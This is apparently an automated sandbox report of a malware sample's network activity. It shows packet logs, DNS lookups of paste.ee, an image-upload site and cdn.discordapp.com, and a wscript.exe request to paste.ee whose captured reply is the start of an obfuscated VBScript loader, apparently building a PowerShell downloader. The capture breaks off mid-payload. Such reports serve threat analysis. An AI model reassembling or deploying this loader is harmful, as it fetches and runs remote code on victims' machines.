      May 27, 2024 15:21:12.348190069 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.348216057 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.348225117 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.348344088 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.348391056 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.348412037 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.348417997 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.348440886 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.348459005 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.428466082 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.428528070 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.428571939 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.428585052 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.428700924 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.428754091 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.428761005 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.428761005 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.428761005 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.428788900 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.428819895 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.428852081 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.429013968 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.429059029 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.429085970 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.429092884 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.429120064 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.429145098 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.430464029 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.430536032 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.430536032 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.430562019 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.430594921 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.430615902 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.431288004 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.431328058 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.431349993 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.431355953 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.431379080 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.431394100 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.432403088 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.432446003 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.432471037 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.432482004 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.432502985 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.432518005 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.434674978 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.434715986 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.434743881 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.434751034 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.434773922 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.434792042 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.434945107 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.434983969 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.435007095 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.435013056 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.435039043 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.435050964 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.515273094 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.515331984 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.515396118 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.515408993 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.515455961 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.515502930 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.515544891 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.515558958 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.515569925 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.515602112 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.515625000 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.515788078 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.515829086 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.515851974 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.515857935 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.515886068 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.515912056 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.516661882 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.516702890 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.516727924 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.516735077 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.516762018 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.516782045 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.517107964 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.517193079 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.517214060 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.517220974 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.517256021 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.517277002 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.518249989 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.518292904 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.518321037 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.518327951 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.518353939 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.518379927 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.520283937 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.520327091 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.520356894 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.520363092 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.520386934 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.520414114 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.520473003 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.520512104 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.520538092 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.520543098 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.520576000 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.520590067 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.602643013 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.602726936 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.602775097 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.602783918 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.602818012 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.602840900 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.602919102 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.602961063 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.602984905 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.602991104 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.603017092 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.603039026 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.603128910 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.603168011 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.603192091 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.603198051 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.603225946 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.603250027 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.603513956 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.603554964 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.603580952 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.603588104 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.603615046 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.603632927 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.603960991 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.604000092 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.604024887 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.604031086 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.604062080 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.604074955 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.605181932 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.605220079 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.605245113 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.605251074 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.605283022 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.605299950 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.606899977 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.606919050 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.606956005 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.606961966 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.606986046 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.607008934 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.607214928 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.607234001 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.607269049 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.607275009 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.607297897 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.607317924 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.689295053 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.689317942 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.689366102 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.689373970 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.689405918 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.689421892 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.689704895 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.689723969 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.689764023 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.689769983 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.689788103 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.689815044 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.690135002 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.690165043 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.690191984 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.690196991 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.690213919 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.690232038 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.690654993 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.690681934 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.690715075 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.690721989 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.690745115 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.690751076 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.691041946 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.691061020 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.691095114 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.691101074 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.691121101 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.691132069 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.697755098 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.697779894 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.697853088 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.697859049 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.697897911 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.698213100 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.698231936 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.698268890 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.698273897 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.698302031 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.698307991 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.698506117 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.698524952 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.698570967 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.698579073 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.698616028 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.776495934 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.776518106 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.776547909 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.776554108 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.776572943 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.776586056 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.776844978 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.776865005 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.776897907 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.776904106 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.776918888 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.776941061 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.777370930 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.777390957 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.777420998 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.777426004 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.777450085 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.777461052 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.777853966 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.777873039 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.777901888 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.777908087 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.777936935 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.777942896 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.778287888 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.778306007 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.778338909 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.778346062 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.778367996 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.778388977 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.783879995 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.783937931 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.783942938 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.783963919 CEST44349732188.114.97.3192.168.2.4
      May 27, 2024 15:21:12.784002066 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:12.784297943 CEST49732443192.168.2.4188.114.97.3
      May 27, 2024 15:21:18.127815962 CEST49733443192.168.2.4162.159.134.233
      May 27, 2024 15:21:18.127892017 CEST44349733162.159.134.233192.168.2.4
      May 27, 2024 15:21:18.127959967 CEST49733443192.168.2.4162.159.134.233
      May 27, 2024 15:21:18.128197908 CEST49733443192.168.2.4162.159.134.233
      May 27, 2024 15:21:18.128227949 CEST44349733162.159.134.233192.168.2.4
      May 27, 2024 15:21:18.601320028 CEST44349733162.159.134.233192.168.2.4
      May 27, 2024 15:21:18.601412058 CEST49733443192.168.2.4162.159.134.233
      May 27, 2024 15:21:18.603482008 CEST49733443192.168.2.4162.159.134.233
      May 27, 2024 15:21:18.603504896 CEST44349733162.159.134.233192.168.2.4
      May 27, 2024 15:21:18.603764057 CEST44349733162.159.134.233192.168.2.4
      May 27, 2024 15:21:18.604892015 CEST49733443192.168.2.4162.159.134.233
      May 27, 2024 15:21:18.646512985 CEST44349733162.159.134.233192.168.2.4
      May 27, 2024 15:21:18.740017891 CEST44349733162.159.134.233192.168.2.4
      May 27, 2024 15:21:18.740084887 CEST44349733162.159.134.233192.168.2.4
      May 27, 2024 15:21:18.740149975 CEST49733443192.168.2.4162.159.134.233
      May 27, 2024 15:21:18.745672941 CEST49733443192.168.2.4162.159.134.233
      TimestampSource PortDest PortSource IPDest IP
      May 27, 2024 15:21:01.569272995 CEST6077753192.168.2.41.1.1.1
      May 27, 2024 15:21:01.577045918 CEST53607771.1.1.1192.168.2.4
      May 27, 2024 15:21:04.855348110 CEST5705753192.168.2.41.1.1.1
      May 27, 2024 15:21:04.909157038 CEST53570571.1.1.1192.168.2.4
      May 27, 2024 15:21:18.119788885 CEST5486153192.168.2.41.1.1.1
      May 27, 2024 15:21:18.127307892 CEST53548611.1.1.1192.168.2.4
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      May 27, 2024 15:21:01.569272995 CEST192.168.2.41.1.1.10x7bccStandard query (0)paste.eeA (IP address)IN (0x0001)false
      May 27, 2024 15:21:04.855348110 CEST192.168.2.41.1.1.10xeb94Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
      May 27, 2024 15:21:18.119788885 CEST192.168.2.41.1.1.10xaff4Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      May 27, 2024 15:21:01.577045918 CEST1.1.1.1192.168.2.40x7bccNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
      May 27, 2024 15:21:01.577045918 CEST1.1.1.1192.168.2.40x7bccNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
      May 27, 2024 15:21:04.909157038 CEST1.1.1.1192.168.2.40xeb94No error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
      May 27, 2024 15:21:04.909157038 CEST1.1.1.1192.168.2.40xeb94No error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
      May 27, 2024 15:21:18.127307892 CEST1.1.1.1192.168.2.40xaff4No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
      May 27, 2024 15:21:18.127307892 CEST1.1.1.1192.168.2.40xaff4No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
      May 27, 2024 15:21:18.127307892 CEST1.1.1.1192.168.2.40xaff4No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
      May 27, 2024 15:21:18.127307892 CEST1.1.1.1192.168.2.40xaff4No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
      May 27, 2024 15:21:18.127307892 CEST1.1.1.1192.168.2.40xaff4No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
      • paste.ee
      • uploaddeimagens.com.br
      • cdn.discordapp.com
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.449730188.114.96.34437252C:\Windows\System32\wscript.exe
      TimestampBytes transferredDirectionData
      2024-05-27 13:21:02 UTC319OUTGET /d/rXYIP HTTP/1.1
      Accept: */*
      Accept-Language: en-ch
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: paste.ee
      Connection: Keep-Alive
      2024-05-27 13:21:02 UTC1240INHTTP/1.1 200 OK
      Date: Mon, 27 May 2024 13:21:02 GMT
      Content-Type: text/plain; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      Cache-Control: max-age=2592000
      strict-transport-security: max-age=63072000
      x-frame-options: DENY
      x-content-type-options: nosniff
      x-xss-protection: 1; mode=block
      content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x522%2BKkyJJVDtW%2FOqYTfGSNVb71vWe8%2FuRrA%2BvHfs4sL5gBWiupPOj%2F3ABPMEhtmkFfp4%2FWyVZtmxim0NDEl0UwDlxpou1XK2gNH0A4nbl6sHGgGYX8UtffpKw%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88a64e44ae26432c-EWR
      alt-svc: h3=":443"; ma=86400
      2024-05-27 13:21:02 UTC129INData Raw: 33 38 33 33 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 61 6e 74 69 63 69 70 61 72 20 2c 20 66 65 6e 65 64 69 6e 61 20 2c 20 62 6f 72 7a 65 67 75 69 6d 20 2c 20 6a 75 72 75 70 65 6d 61 20 2c 20 72 65 6c 65 6e 74 61 72 20 2c 20 43 61 6d 61 20 2c 20 72 65 6c 65 6e 74 61 72 31 0d 0a 20 20 20 20 20 66 65 6e 65 64 69 6e 61 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 62 6f 72 7a 65 67 75 69 6d 20
      Data Ascii: 3833 dim anticipar , fenedina , borzeguim , jurupema , relentar , Cama , relentar1 fenedina = " " borzeguim
      2024-05-27 13:21:02 UTC1369INData Raw: 20 3d 20 22 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51
      Data Ascii: = "" & jurupema & fenedina & jurupema & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQ
      2024-05-27 13:21:02 UTC1369INData Raw: 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 51 42 68
      Data Ascii: reG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & jurupema & fenedina & jurupema & "gBvDgTreHIDgTre" & jurupema & fenedina & jurupema & "QBh
      2024-05-27 13:21:02 UTC1369INData Raw: 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49 44 67 54 72 65 63 67 44 67 54 72 65 76 44 67 54 72 65 47 6b 44 67 54 72
      Data Ascii: redDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & jurupema & fenedina & jurupema & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & jurupema & fenedina & jurupema & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTr
